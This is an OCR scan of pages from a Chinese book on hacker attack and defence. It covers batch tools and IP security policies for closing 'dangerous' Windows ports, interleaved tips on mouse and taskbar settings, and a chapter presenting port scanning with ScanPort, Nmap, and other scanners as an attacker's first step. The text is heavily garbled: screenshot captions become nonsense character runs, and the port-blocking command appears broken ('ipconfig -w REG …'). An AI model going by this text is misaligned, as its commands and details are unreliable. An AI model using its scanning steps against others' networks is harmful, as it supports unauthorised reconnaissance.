却 无 法 删除 。 这 时 ， 可 以 通过 “命令 提示 符 ” 
窗口 ， 运 行 netuser“ 隐 藏 账号 ”“ 新 密码 ?” 
命令 来 更 改 隐藏 账号 的 登录 密码 ， 使 黑客 
无 法 登录 该 账号 。 


4.6 实战 演练 


名 实战 演练 1 一 一 扫描 并 批量 关闭 系统 危险 
端口 

众所周知 ， 网 络 上 木马 病毒 无 孔 不 入 ， 
在 各 种 防护 手段 中 ， 关 闭 系统 中 的 危险 端 
口 是 非 常 重要 的 ， 但 是 对 于 计算 机 新 手 来 
说 ， 哪 些 端口 是 危险 的 ， 哪 些 端口 是 不 危 
险 的 ， 并 不 清楚 。 下 面 介绍 一 些 自动 关闭 
危险 端口 的 方法 ， 来 帮助 用 户 扫 描 并 关闭 
危险 的 端口 。 

对 于 初学 者 来 说 ， 一 个 一 个 地 关闭 危 
险 端 口 太 麻烦 了 ， 而 且 也 不 知道 哪些 端口 
应 该 关闭 ， 哪 些 端 口 不 应 该 关闭 。 不 过 用 
户 可 以 使 用 一 个 叫 作 “危险 端口 关闭 小 助 
手 ” 的 工具 来 自动 关闭 端口 ， 具 体 的 操作 
步骤 如 下 。 
[ep 国 下 载 并 解压 缩 “危险 端口 关闭 小 助手 ” 
工具 ， 在 解压 的 文件 中 双击 “自动 关闭 危 
险 端 口 bat” 批 量 处 理 文件 ， 则 可 自动 打开 
“命令 提示 符 ” 窗 口 ， 并 在 其 中 显示 关闭 
状态 信息 ， 如 下 图 所 示 。 


六 得 呈 : CNWINDOWS\systemaaer 


We 由 
Ee BPortal Of Toni 


您 的 系统 可 以 免 要 流行 早生 病毒 及 木马 后 门 的 侵 扶 ! 
i++ 特 剧 注意 ， 不 要 关闭 ， 请 按 任 音 刍 进行 Vin 服务 器 过 小 生路 | tre 


step 贺 关闭 结束 后 ， 系 统 中 的 危险 端口 就 全 
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部 被 关闭 掉 了 。 当 程序 停止 后 , 不 要 关闭 “ 命 
令 提 示 符 ”窗口 ， 这 时 按 任意 键 ， 或 继续 
运行 “Win 服务 器 过 滤 策 略 ”， 然 后 再 进行 
木马 服务 端口 的 关闭 ， 全 部 完成 后 ， 系 统 
才 做 到 真正 的 安全 ， 如 下 图 所 示 。 


丽 管 到: C\WWINDOWS\system32\cmd.exe 一 口 x 


| 


使 用 “危险 端口 关闭 小 助手 ”工具 还 
可 以 手工 修改 、 自 动 关闭 端口 ， 利 用 该 功 
能 可 以 把 最 新 的 端口 添加 到 关闭 的 列表 中 。 
用 记事 本 打开 “关闭 危险 端口 .bat” 文 件 ， 
即 可 在 其 中 看 到 关闭 端口 的 重要 语句 rem 
ipconfig -w REG -p “HFUT SECU” -r“Block 
UDP/138” -f *+0:138:UDP -n BLOCK -x 
>nul， 其 中 UDP 参数 用 于 指定 关闭 端口 使 
用 的 协议 ，138 参数 是 要 关闭 的 端口 。 


[step 园 参照 步骤 03 语句 ， 可 以 手工 添加 语 
句 ， 将 一 些 新 的 木马 病毒 使 用 的 端口 加 入 
到 关闭 列表 中 。 例 如 ， 要 关闭 新 木马 使 用 
的 8080 端口 ， 则 可 以 添加 如 下 语句 Tem 
ipconfi g -w REG -p“ HFUT SECU”-r“Block 
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UDP/8080” -f *+0:8080:UDP -n BLOCK -x 
>nul， 添 加 完成 后 的 显示 效果 如 下 图 所 示 。 


= 


EE 


ipeantig -w REG -p “HFUT_SECU” -~r "Block 


step 国 添加 完毕 后 ， 将 该 文件 保存 为 .bat 文 
件 ， 重 新 运行 即 可 关闭 新 添加 的 端口 。 


9 实战 演练 2 一 一 通过 IP 安 全 策略 关闭 危险 


端口 


通过 他 安全 策略 可 以 关闭 各 种 系统 中 
的 危险 端口 ， 并 对 系统 进行 可 靠 的 安全 保 
护 。“IP 安全 策略 自动 设置 工具 ”是 一 个 
比较 好 用 且 功 能 多 样 的 工具 ， 为 用 户 提供 
了 3 种 网 络 类 型 ， 可 以 关闭 和 开启 常见 的 
危险 端口 ， 在 计算 机 未 安全 防火 墙 时 ， 可 
以 有 效 地 保护 系统 的 安全 。 使 用 “IP 安全 
策略 自动 设置 工具 ”的 具体 操作 步骤 如 下 。 
下 载 并 运行 “IP 安全 策略 自动 设置 工 
具 ”， 即 可 打开 该 工具 的 主 界面 ， 在 其 中 用 
户 可 以 看 到 该 工具 提供 的 3 种 网 络 类 型 ， 
如 下 图 所 示 。 

三 欢迎 使 用 IP 安全 第 骆 设置 工具 ! 深山 红叶 .。 一 x 


生 适合 普通 单机 的 1P 安 全 策略 
全 适合 服务 器 的 IP 安 全 策略 


人 @ 开放 网 上 邻居 及 服务 器 端口 


第 一 种 : 适合 普通 单机 的 人 P 安全 策略 ， 


56 


执行 后 可 以 过 滤 常 见 的 危险 端口 访问 ， 也 
可 以 对 家 庭 用 户 的 Windows 系统 进行 设置 ， 
但 是 不 适合 服务 器 的 系统 。 

第 二 种 : 适合 服务 器 的 了 P 安全 策略 ， 
适用 于 Windows 服务 器 的 计算 机 ， 默 认 情 
况 下 不 过 滤 80 等 服务 器 常用 的 端口 。 

第 三 种 : 开放 网 上 邻居 及 服务 器 端口 ， 

此 安全 策略 用 于 打开 服务 和 网 上 邻居 的 常 
用 端口 ， 也 用 于 对 误 用 策略 类 型 后 的 修改 。 
一 般 情 况 下 ， 第 三 种 选项 是 不 使 用 的 。 但 
是 系统 有 时 候 进 行 了 系统 设置 和 服务 优化 ， 
导致 无 法 访问 网 上 邻居 ， 无 法 进行 文件 共 
享 等 情况 时 ， 就 可 以 使 用 该 选项 ， 重 新 开 
放 网 上 邻居 以 及 文件 共享 等 。 
在 “IP 安全 策略 自动 设置 工具 ” 主 
界面 中 选择 第 1 项 ， 即 可 自动 打开 修改 IP 
安全 策略 的 窗口 ， 设 置 完 毕 后 ， 系 统 可 以 
免 受 流行 病毒 与 木马 后 门 的 侵扰 ， 如 下 图 
所 示 。 


用 的 21 80 4000 端口 ， 双 重 保 


名 响应 组 提 熏 您 注 


计算 机 后 设置 开始 生效 ! 


pp 


任意 键 进 出 ! 


[sep 图 关闭 网 上 邻居 和 共享 。 用 WinRAR 工 
具 打 开 “IP 安全 策略 自动 设置 工具 ”的 主 
程序 “IPsec 自动 设置 工具 .exe”， 在 其 中 
可 以 看 到 有 4 个 自 解压 文件 ， 如 下 图 所 示 。 


轩 | 回电 : | IPsec 全 动 设置 工具 s 
扣 挤 才 © 
¢ - 个 是 <“ ipan- ，IpsecB- v| 吕 | 痪 索 "Pse， 
名 称 
二 快速 访问 
日 as5pownlcy 目 。 二 ps 和 ah 得 T 具 
i 中 Win 县 和 访 策 四 
中 开放 网 上 令 时 及 服务 器 关口 
in ” 汐 基 天 PC 安全 这 污 入 路 
国文 翌 
EA 
EL 
BNR <“ 
4 个 项 目 辆 忆 


[st 加 使 用 相同 的 方法 解压 缩 “ 普 通 PC 
安全 过 滤 策 略 .exe” 文 件 ， 然 后 再 解压 
缩 其 中 的 “普通 PC 安全 过 滤 策 略 .bat” 
文件 并 用 记事 本 打开 ， 搜 索 其 中 以 “rem 
”开头 的 字符 串 ， 如 下 图 所 示 。 


ipseccmd… 


习 基 盏 rcC 六 全 过 二 第 晤 -记事 本 


re 


step 图 去 掉 前 面 的 rem 字符 ， 修 改 完 毕 后 
保存 该 文件 ， 然 后 重新 将 “普通 PC 安全 过 
滤 策 略 .bat” 文 件 拖 入 到 “普通 PC 安全 过 
滤 策 略 .exe” 压 缩 包 中 ， 双 击 执行 后 ， 即 
可 禁止 网 上 邻居 的 共享 文件 传输 ， 并 禁止 
NetBIOS/SMB 服务 、 文 件 和 打印 机 共享 ， 
如 下 图 所 示 。 


前 二 PC 交 字 这 往生 中 .记事 二 - oO x 
安 人 月 妨 雪 (二 式 (Oj 二 看 V】 才 反 HD 


小 试 身 手 
怎样 用 左手 操作 鼠标 

如 果 用 户 习惯 用 左手 或 者 右手 残疾 的 
用 户 来 操作 鼠标 ， 就 需要 对 系统 进行 简单 

的 设置 ， 以 满足 用 户 个 性 化 的 需求 ， 设 置 

的 具体 操作 步骤 如 下 。 


第 4 章 “缓冲 区 溢出 攻击 与 网 络 渗透 入 侵 Se 


step 图 在 桌面 的 空白 处 右 击 ， 在 弹出 的 快捷 
菜单 中 选择 “个 性 化 ”菜单 命令 ， 在 弹出 
的 “设置 ”窗口 右 侧 ， 单 击 < 主题 ”一 “ 饼 
标 光 标 ” 


超 链 接 ， 如 下 图 所 示 。 


[step 图 弹出 “和 扎 标 属性 ”对 话 框 ， 选 择 “ 饼 
标 键 ” 选 项 卡 ， 然 后 选中 “切换 主要 和 次 
要 的 按钮 ” 复 选 框 ， 单 击 “ 确 定 ” 按 钮 即 
可 完成 设置 ， 如 下 图 所 示 。 


写生 要 作 x 


最 5 旭 所 。 指 时 汉 页 湖 纶 。 硬 人 

res 

Ti 

此 舌 运 站 闪闪 厂 过 全 没 成 如 泛 兰 和 权 各 主要 人 | 


\ 


双 二 这 度 

基文 伯 突 以 入 册 催生 ,如 时 六 伯 二 条 开关 
EE 

EID 志 [| | ~ 
音 二 位 定 

口 启用 单 主 娠 十 ( 站 1 井上 日- 


要 他 可 以 不 直 一 直 按 香 中 标 颖 名 就 可 以 疯 出 旺 寺 三 旗 搜 ， 单 如 过 
入 名 宇 状 李 再 久 总 主 各 二 可 角 六 二 ， 


Ce lw | asw | 


练习 2: 将 应 用 程序 固定 到 任务 栏 


用 户 除 了 可 以 将 程序 固定 到 “开始 ”局 

屏幕 外 ， 还 可 以 将 程序 固定 到 任务 栏 中 的 
快速 启动 区 域 ， 方 便 使 用 程序 时 ， 可 以 快 
速 启动 。 
[step 图 单 去 “开始 ”按钮 ， 选 择 要 添加 到 任 
务 栏 的 程序 ， 右 击 ， 在 弹出 的 快捷 菜单 中 
选择 “固定 到 任务 栏 ” 菜 单 命 令 ， 即 可 将 
其 国定 到 任务 栏 中 ， 如 下 图 所 示 。 
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A Access 2016 


step 较 对 于 不 常用 的 程序 图 标 ， 用 户 也 可 以 
将 其 从 任务 栏 中 删除 。 右 击 需 要 删除 的 程 
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序 图 标 ， 在 弹出 的 快捷 菜单 中 选择 “从 任 
务 栏 取消 国定 ”菜单 命令 ， 如 下 图 所 示 。 


InPrivate 窗口 


Microsoft Edge 
礁 从 任务 栏 取消 国定 
X 六 5 窑 口 


第 5 童 ” 目 标 系统 的 扫描 与 网 络 
数据 的 噢 探 


扫描 目标 系统 与 嗅 探 网 络 中 的 数据 是 黑客 必 备 的 基本 功 ， 因 为 这 是 黑客 进行 攻击 之 
前 的 第 一 步 。 本 章 介绍 目标 系统 的 扫描 与 嗅 探 网 络 数据 的 方法 ， 主 要 内 容 包 括 扫 描 目标 
系统 的 端口 信息 、IPCS$ 用 户 列 表 、 指 定 地 址 范围 内 的 目标 主机 、 嗅 探 网 络 中 的 数据 信 


5.1 扫描 目标 系统 的 端口 信息 Fm 


信息 设置 扫描 结果 
Pe 起 始 IF:|192 .168 .0 1 192. 168.0.1: 80 ~ 
服务 器 上 所 开放 的 端口 往往 是 黑客 潜 0 
在 的 入 侵 通 道 ， 对 目标 主机 进行 端口 扫描 庙 D 呈 :ET55 600 | |192. 168.0. 106: 139 
能 够 获得 许多 有 用 的 信息 ， 而 进行 端口 扫 起 时 厂 20 。 训 | 冯 8819713 
描 的 方法 也 很 多 ， 可 以 是 手工 进行 扫描 i 


也 可 以 用 端口 扫描 软件 进行 ， 黑 客 常用 的 NE 


口 Nmap、 SuperS 
WE 6 国 如 果 扫 描 菜 台 计算 机 中 开启 的 端口， 
加 绝招 1: 使 用 ScanPort 扫 描 端口 则 将 起 始 JP 和 结束 IP 都 设置 为 该 主机 的 IP 


地 址 ， 如 下 图 所 示 。 
车 scanPort 软件 不 但 可 以 用 于 网 络 扫描 ， = 
同时 还 可 以 探测 指定 了 P 及 端口 ， 速 度 比 传 。 |" -一 


信息 设置 扫 措 结果 
统 软件 快 ， 且 支持 用 户 自 设 卫 端口 ， 增 加 起 始 IP:|192 166 0 104 
了 其 灵活 性 ， 具 体 的 操作 步骤 如 下 。 2 hsz 168 .0 104 
口号 :|80, 139, 440-445 
下 载 并 运行 ScanPort 程序 ， 即 可 打开 | 
ScanPort 主 窗口 ， 在 其 中 设置 起 始 IP、 结 4 一 
束 卫 以 及 要 扫描 的 端口 号 ， 如 下 图 所 示 。 i 二 
昼 scanport 各 x 
Hm [step 国 在 设置 完 和 要 要 描 的 端口 号 后 , 单 击 “要 
起 始 IF:|192 .168 .0 .1 


描 ” 按 钮 ， 即 可 扫描 出 该 主机 中 开启 的 端 
口 (设置 端口 范围 之 内 ) ， 如 下 图 所 示 。 


结束 IF:|192 .168 . 0 254 


端口 号 :|80, 139, 440-445 


超 时 :| ”200 毫秒 胃 Scanport 一 x 
线程 数 10 信息 设置 扫 指 结果 
起 始 IP:[192 .168 . 0 .104 192. 168. 0. 104; 139 
扫 撕 关于 . 退出 结束 IP -52 66 0 104 198. 188 0. 104: 445 
端口 号 :|80, 139, 440-445 
Ee 国 单 二 “扫描 ”按钮 ， 即 可 进行 扫描 ， 起 时 站-505 一 
从 扫描 结果 中 可 以 看 出 设置 的 人 P 地 址 段 中 线 数 厂 ”10 


计算 机 开启 的 端口 ， 如 下 图 所 示 。 Ee 


黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


加 注 襄 况 绝招 2: 使 用 “Nmap 扫 描 器 ”扫描 端口 


“Nmap 扫描 器 ”是 一 款 针 对 大 型 网 络 


”的 端口 扫描 工具 ， 包 含 多 种 扫描 选项 ， 它 


对 网 络 中 被 检测 到 的 主机 按照 选择 的 扫描 
选项 和 显示 节点 进行 探查 。 用 户 可 以 建立 
一 个 需要 扫描 的 范围 ， 这 样 就 不 需要 再 输 
入 大 量 的 卫 地 址 和 主机 名 了 。 

使 用 Nmap 进行 扫描 的 具体 操作 步骤 
如 下 。 
[step 图 在 和 桌面 上 双击 Nmap 程序 图 标 ， 即 可 
打开 Zenmap 操作 界面 ， 如 下 图 所 示 。 


一 Zenmap ss 
扫 搞 la) 工具 中 配 轩 帮助 tt 
Ba :| Irtense scan -| 本 项 
确信 nmap -14-Av 
再 | 局 和 Nmap 各 二 讽 D/ 主 机 拓扑 主机 明细 扫 径 
强 作 胃 统 主机。 ~ a 
过 二 主机 


[step 园 有 要 扫描 单 台 主机 ， 可 以 在 “目标 ”后 
的 文本 框 内 输入 主机 的 卫 地 址 或 网 址 ， 要 
扫描 某 个 范围 内 的 主机 ， 可 以 在 该 文本 框 
中 输入 192.168.0.1-150， 如 下 图 所 示 。 


他 zenmap - 0O x 
扫 接 (a) 工具 中 配置 (9) 帮助 (H) 
目标 192.1680.1-15d| BE: © Intense scan “| 35) BE 
确信 |nmap -T4 -A v 192.168.0.1-150 
EE Nmap 答 出 党 /主机 二 六 主机 明 吉 扫 按 
损 作 到 结 《 主机 。 <^ EE 
过 主机 
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移 提 示 : 在 扫描 时 ， 还 可 以 用 “*#?” 替 换 掉 
人 P 地 址 中 的 任何 一 部 分 ， 如 192.168.1.*# 等 
同 于 192.168.1.1-255; 要 扫描 一 个 更 大 范围 
内 的 主机 ， 可 以 输入 “192.168.1，2，3.*”， 
此 时 将 扫描 192.168.1.0、192.168.2.0、 
192.168.3.0 三 个 网 络 中 的 所 有 地 址 。 


[step 图 要 设置 网 络 扫描 的 不 同 配置 文件 ， 可 
以 单 击 “ 配 置 ” 后 的 下 拉 列 表 框 ， 从 中 选择 
Intense scan、 Intense scan plus UDP、 Intense 
scan、all TCP ports 等 选项 ， 从 而 对 网 络 主 
机 进行 不 同方 面 的 扫描 ， 如 下 图 所 示 。 


全 Zermap 一 口 x 
3 工具 0 配 重 帮助 H) 
E 昧 |1@2.16801-150 :| Intense scan 内 EE 
命令 ;|nmap -T4 -A -v 192.168.0.1-150 Intense scan 
intence ecan plac UDP 
La ww NmepM W/E 机 nonse scan, al TCP ports 
损 作 系统 三 机 ~ Intense scan ne Fing 多 
ping scan 
Quidk scan 
Regular ccan 
Slow comprehensve scan 
| 过 寺 主 亿 


单 去 “扫描 ”按钮 开始 扫描 ， 稍 等 一 
会 儿 ， 即 可 在 “Nmap 输出 ”选项 卡 中 显示 
扫描 信息 ， 可 以 看 到 扫描 对 象 当前 开放 的 
端口 ， 如 下 图 所 示 。 


一 zermep - 0O x 
El) IAD RSC) NH) 
Em 19216801-150 司 WM rtense son 


:nmap T4-A v1S2158.01-150 


EL 
要 人 EF 扩 4 主 抽 


Nmep 纺 二 这 /二 4 主轴 国 四 拓 阁 


men 


step 图 选择 “端口 /主机 ”选项 卡 ， 在 打开 
的 界面 中 可 以 看 到 当前 主机 显示 的 端口 、 
协议 、 状 态 和 服务 信息 ， 如 下 图 所 示 。 


第 5 章 ”目标 系统 的 扫描 与 网 络 数据 的 嗅 探 


二 zerop = 人 
A TED EED wm 
ER 19216801-150 司 we [meme en 


S$: |nmap T4-AY 192.16301-150 


GD Nmap 累 潮 鞭 品 / 主 所 区 #， 王 机 明生 刁 并 
en 1 
口 680 |e mw opm hp 
于。 21580104 | ® tao wp epen von 
90180105 
4 12158012 
E27 


step 鸭 选择 “拓扑 ”选项 卡 ， 在 打开 的 界面 
中 可 以 查看 当前 网 络 中 计算 机 的 拓扑 结构 ， 
如 下 图 所 示 。 


Zenmep - O x 
El) IAD Eap Wy 
RR 192168.01-150 司 wm: [mewe can 四 证 一生 


:nmap -T4- ny 192.1680.1-150 


Map W/EN Fs Eps SE 
作 系统 4 主机 | ficheye a 
e216801 
921680104 


legend SFE 


1921680:106 
1921580N2 


EN 


[step 国 单 去 “查看 主机 信息 ”按钮 ， 打开“ 查 
看 主机 信息 ”窗口 ， 在 其 中 可 以 查看 当前 
主机 的 一 般 人 信息、 操作 系统 等 ， 如 下 图 
所 示 。 


| 全 查看 主 扔 信息 - DO Xx 
3 +: 三 用 服务 器 沁 对 
1921680106 站 全 
1921680.112 Mt; | fpvql 19216801 
1921680104 
二 机 各: 


出 iB 动 Wed Au3 02 034245 2017 (11155577 
0 
BeRM8D: sonco open 司 


EE a 开 肥 


PEE 
66。 Carcn imageRUNNER C5195 Printcr 避 


Step[ 在 “查看 主机 信息 ”窗口 中 选择 “ 服 
务 ” 选 项 卡 , 可 以 查看 当前 主机 的 服务 信息 ， 
如 端口 、 协 议 、 状 态 等 ， 如 下 图 所 示 。 


e216801 
192.1680105 


sz16ao112 
ez1ean1os 


选择 “路 由 追踪 ”选项 卡 ， 在 打开 的 
界面 中 可 以 查看 当前 主机 的 路 由 器 信息 ， 
如 下 图 所 示 。 


”NN 二“ 自问 


= 二 瓜 务 关上 过 队 
192.16801 
FT ART ES 


192.168.0.106 
192.168.0112 
192168.0104 


<b>/<b> 扩 下 由 六 了 信息 各 闪 <b>1<b> 交 7099 训 ， 


[steep 回 在 Nmap 操作 界面 中 选择 “主机 明细 ” 
选项 卡 ， 在 打开 的 界面 中 可 以 查看 当前 主 
机 的 明细 信息 ， 包 括 主机 状态 、 地 址 列表 、 
操作 系统 等 ， 如 下 图 所 示 。 


二 ermap = x 
Fs IRD RED md) 
BE 19216801-150 -| EE renee eenn 习 国 
BS: nmap 14 Av 19215801-150 
EE 
nemasn + lam 
口 ise16801 EEN 
e2680104 WE wp 
1921680106 Fm 2 | 
e260112 tm: 599 
sD 0 
ERED，1000 
Ha 本 1155577 局 | 
BSED Wed hug 02 0342452017 
i 
Wp 15216801 
p60 
MA FB30D:33:6073 
Es 
二 Si Carcn imegcRUNNER C5185 printer 
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黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


绝招 3: 使 用 “极速 端口 扫描 器 ”扫描 端口 在 “开始 IP” 和 “ “结束 WR” ed 
口 的 工具 ,利用 该 工具 不 仅 可 以 扫描 端口 ， 置 9 we 了 和 ~ 又 
而 且 可 以 实现 在 线 更 新 他 地 址 。 另 外， 还 


(© FRV20500 


可 以 将 扫描 结果 导出 为 记事 本 、 网 页 以 及 。 > 一 
XLS 格式 。 区 3 

使 用 该 工具 扫描 端口 的 具体 操作 步骤 “= = 
如 下 。 


step 团 下载 并 运行 “极速 端口 扫描 器 
V2.0.500”， 即 可 打开 “极速 端口 扫描 器 ” 
主 窗口 ， 如 下 图 所 示 。 


时 ET 
i 6 BE 
0 - 
Ed | 
0 时 强 srf 二 
-1 a | 3 Ir ch om 

到 

和 [step 图 单 去 “全 消 ”按钮 ， 即 可 取消 选择 所 

Sem 


有 的 全 段 ， 然 后 选中 刚 添加 的 IP 段 ， 并 将 
要 扫描 的 端口 设置 为 445， 如 下 图 所 示 。 


ERRV20500 


RE 天生 拉 认 “基于 大 风声 万 更新 
pr [ms 可 Ey 
| wo "时 00 委 00 种 这 二 习 旨 
|| Pp 当 3 
[step 图 切换 到 “参数 设置 ”选项 卡 ， 在 其 中 
即 可 看 到 该 工具 自 带 的 卫 地 址 段 以 及 各 种 
参数 。 
ER 人 
于 利夫 让 方 E 计 
基 涉 优 相 
就 和 下 个 rn 
Re 十 A 
iD | 
Step 图 设置 完毕 后 ， 切 换 到 “开始 搜索 ” 选 
项 卡 ， 单 击 “ 开 始 搜 索 ” 按 钮 ， 即 可 扫描 
指定 的 四 段 , 最 终 的 扫描 结果 如 下 图 所 示 。 
|® RERDEEESV20500 x 
se 人 
Ne 大 洪山 次 件 工作 宇 坟 于 天 gxwdjh@zchwcomjy 二 1 


step 图 如 果 要 对 目标 主机 进行 扫描 ， 则 需 ; 
加 指定 的 下段 。 在 “参数 设置 ”选项 卡 中 
单 击 “ 增 加 ”按钮 ， 即 可 打开 “了 段 编辑 ” 


对 话 框 ， 如 下 图 所 示 。 i 
2 we 
Ea 
RE | 
ee 
ES 大 流 山区 省 工作 宇 [ 森 丁 天 goowclhjh 全 sohucom] 人 名 


结束 IP 192 156.0 150| 
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[step 国 可 以 将 扫描 的 结果 保存 为 记事 本 、 网 
页 、XLS 等 文件 格式 。 在 “开始 搜索 ” 选 
项 卡 中 单 击 “ 导 出 ”按钮 , 即 可 打开 “另存 为 ” 
对 话 框 ， 如 下 图 所 示 。 


DS 为 x 


EE 


bg 
快 这 训 q BE 卫 
本 加 
点 而 


| 新 建 广 件 夫 PR SF 和 下 

丑 

EE 

地 让 

总 
XH 名 如， 国 a E13) 
人 闪闪 到 0)。 [RX 9 


在 设置 完 保存 名 称 和 路 径 后 , 单 击 “ 保 
存 ” 按 钮 ， 即 可 将 扫描 结果 保存 为 记事 本 
文件 格式 。 打 开 保 存 的 搜索 结果 ， 在 其 中 
即 可 看 到 搜索 到 的 也 地 址 以 及 搜索 的 端口 ， 
如 下 图 所 示 。 


司 IP3 - 记事 二 =: ‘9 X% 
文件 (月 ” 蝙 强 (E) 格式 (0) 


得 看 (V) 帮助 (H) 


渐 绝招 4: 使 用 “S-GUI Ver 扫描 器 ”扫描 
端口 
“S-GUI Ver 扫描 器 ”以 S.exe 为 核心 的 
可 视 化 的 端口 扫描 工具 ， 该 工具 支持 多 端 
口 扫描 、 支 持 线程 控制 、 隐 藏 扫描 、 扫 描 
列表 、 去 掉 端 口 、 自 动 整理 扫描 结果 等 ， 
是 一 款 使 用 起 来 比较 方便 的 端口 扫描 工具 。 
使 用 “S-GUI Ver 扫描 器 ”扫描 端口 的 
具体 操作 步骤 如 下 。 
Eee 加 下 载 并 解压 “S-GUI Ver2.0” 软 件 ， 
双击 其 中 的 “S-GUI Ver2.0.exe”， 即 可 打开 
“S-GUIVer2.0” 主 窗口 ， 如 下 图 所 示 。 


第 5 章 ”目标 系统 的 扫描 与 网 络 数据 的 嗅 探 = 


纺 -GUI Ver 2.0 - 棕 s EXE 可 现 化 到 汀 沪 太 到 ( 棕 持 体积 声 不 加 控 俯 ) 二 x 
扫 旺 分 惧 : 居所 结 条: 
开始 P: R5215311 开始 扫 搞 |192158.58 50135 
本 有 和 wa 
ET 
结束 P [i52150E555 ”入 并 I 去 述 江 口 
一 | 总 妨 如 (车 
ey 1 有 1 名 101 直 号 抽 果 
I i 
eR 发 站 表 
协议 七 六 TCP 楼 式 、 订 院 基 扫 痢 一 一 
i ES 
[IEETIE Ss i 
2168125 导入 3 慰 打开 Result 
总 1 天 Renu 
21EE1E2 
I1921681E1 仿 止 扫 闹 备份 Result 
畏 空 列表 帮助 文档 : 
ewWiXP 5Pa 线 和 
名 et 控制 如 筷 扫 招 
Sy 请 口 与 动 天理 扫 据 结果 圭 
直人 所作 从 
关于 作者 
作者 殉 龙 9Q 307324653 作 者 主页 :www xp58 cn 


四 在“S-GUI Ver2.0” 窗 口 的 “扫描 分 段 ” 
pe IP 地 址 和 结 
果 扫 描 的 也 地址 ， 然 后 在 “端口 设置 ” 选 
项 框 中 的 “端口 ”文本 框 中 输入 要 扫描 的 
端口 ， 最 后 在 “协议 ”选项 区 中 选中 “TCP” 
单 选 按钮 ， 如 下 图 所 示 。 


全 5-GUI Ver 2.0 - 要 S.EXE 可 杭 化 到 淋 济 尽 到 (保持 体积 决 不 加 控件 ) x 
让 人 了 Eee 
开始 IF JT3210T 开始 扫 措 | 
ET 信 上 要 条 去 后 和 
扫 攻 于 二 本 由 果 
端口 。 35143380.445 [5z 
[| | 
扫 指 列表 = 
SA {Te 
现 扩 | | | Resut | | 
售 上 要 杭 | 新 纷 Resuk 
且 弘 ] wwwx | 
To 
ee 
ss 四 || 
关于 作者 : 
作者 向 万 00.307224593 作者 主页 :www.xp58.en 


Step 图 设置 完毕 后 ， 单 击 “开始 扫描 ”按钮 ， 
好 可 打开 “提示 ”对 其 栓 ， 在 其 中 即 可 天 
到 “扫描 已 经 开始 ， 正 在 扫描 中 ， 扫 描 完 

毕 后 有 提示 ”的 提示 信息 ， 如 下 图 所 示 。 


提示 x 


提 摘 已 经 开始 ,正在 扫描 中 ,扫描 完毕 后 有 提示 。 


Step 加 单 击 “ 确 定 ” 按 钮 ， 将 会 打开 Windows 
Script Host 对 话 框 ， 在 其 中 即 可 看 到 “扫描 
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SEE 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


完毕 , 请 载 入 结果 ”提示 信息 ， 如 下 图 所 示 。 


Windows Script Host XxX 


Le |] 


[step 园 单 击 “ 确 定 ” 按 钮 ， 即 可 返回 “S-GUI 
Ver2.0” 主 窗口 ， 然 后 单 击 右 侧 的 [EXE 果 ] 
按钮 ， 即 可 打开 “提示 ”对 话 框 ， 在 其 中 
即 可 看 到 “你 真 的 要 [ 载 入 结果 ] 吗 ? 如 果 
“是 将 履 盖 掉 [ 扫描 结果 ] 中 的 原 有 数据 ” 
提示 信息 ， 如 下 图 所 示 。 


提示 


你 真 的 要 [ 工 入 结果 ] 吗 ?如 果 " 是 将 会 材 差 掩 | 扫 控 结果 ] 中 的 原 有 数据 . 


sl 


step 国 单 去 “是 ”按钮 ， 即 可 将 扫描 结果 添 
加 到 “扫描 结果 ”文本 区 域 中 ， 在 其 中 即 


ee > 
可 看 到 扫描 到 的 开放 指定 端口 主机 的 下 地 
3 加 二 
址 以 及 端口 号 ， 如 下 图 所 示 。 
仿 5-GUI Ver 2.0 - 梅 S.EXE 可 视 化 到 淋漓 尽 玛 ( 怕 持 体积 天 不 加 控件 ) 一 x 
扫描 分 扫 丹 结果 
开始 IP、1521 本 01 开始 扫描 .01:90 ~ 
| | 
结束 IF 「1921680150 停止 要 并 1821680105.445 
1 色 1680106.135 
1 到 1680106445 息 抽 结果 
名 : 十 研 程 : 同 2 HT 详 中 
协议 六 6 TOP 模式 所 唤 区 要 括 | | | 之 1680108445 
152188 0105-135 清空 结果 
扫 朱 列表 : 152 1680105.80 区 
sa | | 人 ee 
2169 0106.445 
开始 扫描 I1s2.168.0107:135 Resd 
121680107.90 
入 目 扫 措 1 了 21680107.445 间作 Re 
清空 列表 都 助 文档 : 
人 
全 
| 所 全 脱 高 命令 行 操作 
关于 作者 
作者 阿 龙 00:307324693 作者 主页 :www xp58 cn 制作 日 期:2007 年 3 月 26 日 更 新 日 期 :2007.08.30 


[step 国 如 果 想 要 将 扫描 结果 内 容 放 入 到 左 侧 
扫描 列表 中 ， 则 需要 单 击 “发 送 列表 ”按钮 ， 
即 可 打开 “提示 ”对 话 框 ， 在 其 中 即 可 看 
到 “你 真 的 要 将 [扫描 结果 ] 发 送 到 [ 扫描 
列表 ] 吗 ? 如 果 “ 是 ”将 覆盖 掉 [扫描 列表 ] 
中 的 原 有 数据 ”提示 信息 ， 如 下 图 所 示 。 
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提示 


你 真 的 要 将 扫 据 结果] 发 送 到 [ 扫 所 列表] 吗 ?如 果 " 是 将 会 槛 姜 掉 [ 扫 扬 列表] 中 的 原 
有 数 爱 . 


Step 图 单 击 “是 ”按钮 ， 将 打开 “已 经 发 送 
到 [扫描 列表 ] 中 并 去 掉 了 端口 号 ”提示 对 
话 框 ， 如 下 图 所 示 。 


提示 


已 经 发 送 到 上 扫 控 列 旨 ] 中 并 去 掉 了 访 口 号 . 


[step 图 单 去 “确定 ”按钮 ， 即 可 在 “S-GUI 
Ver2.0” 主 窗口 左 侧 的 “扫描 列表 ”中 看 
到 扫描 到 的 主机 列表 以 及 端口 号 ， 如 下 图 
所 示 。 


国 SGUI Ver 2.0 - 村 5.EXE 避 化 到 名 天 到 ( 吕 从 全 相 天 不 hn 控件 ) = x 

3 棋 分 彼 : 习 摔 娃 果 : 

NP 1 本 5 开始 要 梅 fs216801.80 ~ 
i 

we eT LE ] 旭 01 史 4 3 

设置 21901084 二 复制 人 果 

WO fT i 二 

| 

Pa 全 让 二 后 二 

ET ~ Xn | | | 名 1901E45 打开 feat 

i 

1152168010 LE |1s21880107135 es 

上 

a = e 

e2190108 消 定 9 球 RE 

本 

本 i | 

A 人 El 

I1s21690108 oe 

i 

关于 作者 : 

作者 期 市 09 :如 7324633 作者 主页 :wwwyp53 cn 


